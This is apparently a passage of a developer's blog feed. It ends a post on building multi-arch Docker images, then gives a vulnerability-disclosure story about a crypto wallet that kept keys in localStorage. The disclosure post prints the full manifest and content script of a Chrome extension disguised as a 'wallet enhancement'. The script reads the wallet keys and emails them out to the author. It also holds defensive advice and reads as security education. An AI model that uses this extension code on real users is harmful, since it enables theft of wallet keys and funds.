&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PATH="/root/miniconda3/bin:${PATH}"&lt;/span&gt;
&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; PATH="/root/miniconda3/bin:${PATH}"&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;wget &lt;span class="se"&gt;\
&lt;/span&gt;    https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-aarch64.sh &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;mkdir&lt;/span&gt; /root/.conda &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; bash Miniconda3-latest-Linux-aarch64.sh &lt;span class="nt"&gt;-b&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; Miniconda3-latest-Linux-aarch64.sh

&lt;span class="c"&gt;# Create a Conda environment and install native dependencies&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    conda init bash &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; /root/.bashrc &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda update conda &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda create &lt;span class="nt"&gt;-n&lt;/span&gt; de_agent &lt;span class="nv"&gt;python&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3.9 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda &lt;span class="nb"&gt;env &lt;/span&gt;config vars &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; de_agent &lt;span class="nv"&gt;LD_PRELOAD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/lib/aarch64-linux-gnu/libgomp.so.1 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda activate de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda &lt;span class="nb"&gt;install &lt;/span&gt;gdal llvmdev dm-tree &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--upgrade&lt;/span&gt; pip setuptools wheel &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install &lt;/span&gt;h3

&lt;span class="c"&gt;# Copy application files&lt;/span&gt;

&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; app/ .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; logging.yaml .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; main.py .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements.txt ./&lt;/span&gt;

&lt;span class="c"&gt;# Install Python packages&lt;/span&gt;

&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; DE_AGENT_PYPI_TOKEN&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="nb"&gt;.&lt;/span&gt; /root/.bashrc &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; conda activate de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt &lt;span class="nt"&gt;--extra-index-url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;https://&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;DE_AGENT_PYPI_TOKEN&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:@pypi. &lt;span class="k"&gt;****&lt;/span&gt;.ai/pypi/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install &lt;/span&gt;&lt;span class="nv"&gt;numpy&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;1.23.5

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt &lt;span class="nt"&gt;-qy&lt;/span&gt; purge &lt;span class="nt"&gt;--auto-remove&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;apt autoremove &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt clean
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Create a user&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;groupadd &lt;span class="nt"&gt;-r&lt;/span&gt; de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; useradd &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; de_agent de_agent
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;chown&lt;/span&gt; &lt;span class="nt"&gt;-R&lt;/span&gt; de_agent:de_agent /app

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; de_agent&lt;/span&gt;

&lt;span class="c"&gt;# Run the web application&lt;/span&gt;

&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 8000&lt;/span&gt;

&lt;span class="k"&gt;ENTRYPOINT&lt;/span&gt;&lt;span class="s"&gt; ["PYTHONPATH=.", "python", "main.py"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Dockerfile.arm64&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;As you can see, the manifest is quite verbose. It also ships the Conda binaries and related files in the release image. That is the price to be paid.&lt;/p&gt;

&lt;p&gt;Fortunately, for Linux, we don't need all of this machinery:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;python:3.9-slim-buster&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONDONTWRITEBYTECODE=1&lt;/span&gt;
&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONUNBUFFERED=1&lt;/span&gt;

&lt;span class="c"&gt;# Install system packages&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nt"&gt;-y&lt;/span&gt; upgrade
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="nt"&gt;--no-install-recommends&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Copy application files&lt;/span&gt;

&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; app/ .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; logging.yaml .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; main.py .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements.txt ./&lt;/span&gt;

&lt;span class="c"&gt;# Install Python dependencies&lt;/span&gt;

&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; DE_AGENT_PYPI_TOKEN&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt &lt;span class="nt"&gt;--extra-index-url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;https://&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;DE_AGENT_PYPI_TOKEN&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:@pypi. &lt;span class="k"&gt;****&lt;/span&gt;.ai/pypi/

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt &lt;span class="nt"&gt;-qy&lt;/span&gt; purge &lt;span class="nt"&gt;--auto-remove&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;apt autoremove &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt clean
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Create a user&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;groupadd &lt;span class="nt"&gt;-r&lt;/span&gt; de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; useradd &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; de_agent de_agent
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;chown&lt;/span&gt; &lt;span class="nt"&gt;-R&lt;/span&gt; de_agent:de_agent /app

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; de_agent&lt;/span&gt;

&lt;span class="c"&gt;# Run the web application&lt;/span&gt;

&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 8000&lt;/span&gt;

&lt;span class="k"&gt;ENTRYPOINT&lt;/span&gt;&lt;span class="s"&gt; ["PYTHONPATH=.", "python", "main.py"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Dockerfile.amd64&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The question now is how to build Docker images for both architectures on a Mac. This is where Docker Buildx comes in: Docker Desktop officially supports &lt;a href="https://www.docker.com/blog/multi-arch-images/?ref=akrisanov.com"&gt;building multi-arch images for Arm and x86&lt;/a&gt;. Once I learned this, I added a few targets to my Makefile to quickly build the images:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;build: # Build a Docker image for x86_64
    docker buildx build --platform linux/amd64 -t de-agent:amd64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.amd64 --no-cache .

build-arm: # Build a Docker image for arm64
    docker buildx build --platform linux/arm64 -t de-agent:arm64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.arm64 --no-cache .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Makefile&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make build
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RLm9-hA_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Screenshot-2023-08-10-at-21.52.06.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RLm9-hA_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Screenshot-2023-08-10-at-21.52.06.png" alt="Building Multi-Arch Images for Arm and x86" width="800" height="84"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Docker image built for the amd64 architecture&lt;/em&gt;&lt;/p&gt;
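<p>A quick way to double-check which architecture an image was actually built for is to inspect it. A small sketch, using the image tag from the Makefile above:<br>
</p>

<div class="highlight js-code-highlight">
<pre class="highlight shell"><code>docker inspect --format '{{.Os}}/{{.Architecture}}' de-agent:amd64-latest
# linux/amd64
</code></pre>

</div>

<p>The same command against the <code>arm64-latest</code> tag should report <code>linux/arm64</code>.</p>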

&lt;p&gt;One could say that doing all of this locally is a lot of hassle, and that a proper CI pipeline would solve the problem easily. I agree – as I've mentioned, I like shifting work off my shoulders onto some machine in the cloud. But in situations where CI is not available, building multi-arch images locally can save the day. It certainly did for me.&lt;/p&gt;
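<p>For completeness: when a container registry is available, <code>buildx</code> can also build both platforms in a single invocation and push them under one multi-arch tag. A sketch only – the registry name is a placeholder, and it assumes a single Dockerfile that builds on both platforms (which is exactly what the Conda workaround above was about):<br>
</p>

<div class="highlight js-code-highlight">
<pre class="highlight shell"><code>docker buildx create --name multiarch --use
docker buildx build --platform linux/amd64,linux/arm64 \
    -t registry.example.com/de-agent:latest \
    --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} \
    --push .
</code></pre>

</div>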

</description>
      <category>docker</category>
      <category>build</category>
      <category>arm64</category>
      <category>applesilicon</category>
    </item>
    <item>
      <title>Accidentally found a vulnerability in a crypto wallet and made $1,000</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 05 Aug 2023 11:16:49 +0000</pubDate>
      <link>https://dev.to/akrisanov/accidentally-found-a-vulnerability-in-a-crypto-wallet-and-made-1000-4gdl</link>
      <guid>https://dev.to/akrisanov/accidentally-found-a-vulnerability-in-a-crypto-wallet-and-made-1000-4gdl</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ChO6mbd7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/sleeping-shepherd.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ChO6mbd7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/sleeping-shepherd.webp" alt="© RMN / Rèunion des Musèes Nationaux / Sleeping Shepherd by François Boucher" width="800" height="450"&gt;&lt;/a&gt; &lt;em&gt;© RMN / Rèunion des Musèes Nationaux / Sleeping Shepherd by François Boucher&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In January 2022, I joined the community of one of the proof-of-stake blockchains. To play with what the protocol and its ecosystem offered, I created a wallet account on the official website &lt;code&gt;https://wallet. ****.org&lt;/code&gt;. Apart from general curiosity, I was interested in how they achieved security in a browser, especially in the age of extensions and client-side vulnerabilities.&lt;/p&gt;

&lt;p&gt;It turned out that when a user logged in, the wallet application (built in React) generated a set of public and private keys and stored them in the browser's local storage. With my experience of building authentication and authorisation in distributed systems, I knew this was a bad idea – in general, any browser extension or piece of client-side code can read data from local storage&lt;sup&gt;1&lt;/sup&gt;.&lt;/p&gt;

&lt;p&gt;To prove this, I decided to &lt;a href="https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/?ref=akrisanov.com"&gt;write a simple extension for Chrome&lt;/a&gt; that would retrieve keys from a victim's browser and send them to my anonymous email address.&lt;/p&gt;

&lt;p&gt;The root directory of my pickpocket extension looked like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;.
├── content.js
├── email.min.js
├── index.html
└── manifest.json

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The main files are the &lt;code&gt;manifest.json&lt;/code&gt; and &lt;code&gt;content.js&lt;/code&gt;. The former is essential for installing the extension.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "name": "X Wallet Enhancement",
  "version": "1.0",
  "manifest_version": 3,
  "content_scripts": [
    {
      "matches": [
        "https://wallet. ****.org/*"
      ],
      "js": [
        "email.min.js",
        "content.js"
      ]
    }
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;email.min.js&lt;/code&gt; is just a client library from one of the cloud services that allows you to send email directly from a browser without any server code. &lt;code&gt;index.html&lt;/code&gt; is a blank HTML page that displays nothing. The wallet hijacking logic lived in the &lt;code&gt;content.js&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;emailjs.init('user_ ****'); // instantiating an email delivery service

let templateParams = {
    // gathering information about the victim's browser
    from_name: navigator.userAgent,
    // fetching wallet keys from the local storage
    storage: window.localStorage.getItem('_*:wallet:active_account_id_**'),
};

// using a prepared email template to send an email with keys
const serviceID = 'service_ ****';
const templateID = 'template_ ****';

emailjs.send(serviceID, templateID, templateParams)
    .then(() =&amp;gt; {
        console.log("Wallet keys were sent!");
    }, (err) =&amp;gt; {
        console.error(JSON.stringify(err));
    });

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Yes, it really is that simple a script.&lt;/p&gt;

&lt;p&gt;I packed all four files into a zip archive and kindly asked my friend, who also had a wallet at &lt;code&gt;https://wallet.***.org&lt;/code&gt;, to install my creation in his browser (a bit of pretend social engineering). Before doing so, I told him about my findings and the theory I was trying to prove. He was happy to help, and the public and private keys of his wallet account appeared in my inbox a few seconds after the browser extension was installed. Next, I saved the keys to local storage in my browser and opened the wallet website.&lt;/p&gt;

&lt;p&gt;Surprisingly, my friend's crypto-wallet balance was available to me, along with an option to withdraw the funds. During a Zoom call with my victim friend, I transferred some of his funds to an anonymous account and back. It was mind-blowing! A new, promising blockchain that had recently closed an investment round had a major vulnerability in its wallet. Worst of all, although two-factor authentication was available to users, few would activate it right away – and many didn't.&lt;/p&gt;

&lt;p&gt;As an ethical developer, I created a vulnerability report, including the source code of the browser extension and my thoughts on how to improve the security of the web application. It was sent directly to the security team's email address on the 18th of January. A few days later, I had a call with the CISO of the blockchain protocol, who assured me that they were aware of the issue and would address it in the next release. I was a little disappointed with the speed of the incident response – two days is an eternity when users' money is at stake. Nevertheless, the blockchain developers granted me tokens worth the equivalent of 1,000 USDT.&lt;/p&gt;

&lt;p&gt;👉 &lt;strong&gt;Advice for application developers:&lt;/strong&gt; be aware of the technologies you use and their security aspects.&lt;/p&gt;

&lt;p&gt;💡 &lt;strong&gt;Advice for crypto users:&lt;/strong&gt; learn what security options an organisation offers to you, activate two-factor authentication as soon as you create a wallet account, don't store all of your funds in hot wallets.&lt;/p&gt;
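<p>A safer direction, echoed in the links below, is to keep secrets out of JavaScript-readable storage entirely – for example, having the backend issue session material as an <code>HttpOnly</code> cookie, which neither page scripts nor content scripts can read. An illustrative response header, not the wallet's actual fix:<br>
</p>

<div class="highlight js-code-highlight">
<pre class="highlight plaintext"><code>Set-Cookie: session=opaque-session-id; HttpOnly; Secure; SameSite=Strict; Path=/
</code></pre>

</div>

<p>With this pattern, the browser attaches the cookie to requests automatically, but a malicious extension running in the page context – like the one above – has nothing to steal from local storage.</p>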




&lt;h3&gt;
  
  
  Worth reading
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://snyk.io/blog/is-localstorage-safe-to-use/?ref=akrisanov.com"&gt;Is LocalStorage safe to use? | Snyk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rdegges.com/2018/please-stop-using-local-storage/?ref=akrisanov.com"&gt;Please Stop Using Local Storage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies?ref=akrisanov.com"&gt;Using HTTP cookies - HTTP | MDN&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://owasp.org/www-community/HttpOnly?ref=akrisanov.com"&gt;HttpOnly | OWASP Foundation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>crypto</category>
      <category>singlepageapp</category>
      <category>web3</category>
    </item>
  </channel>
</rss>
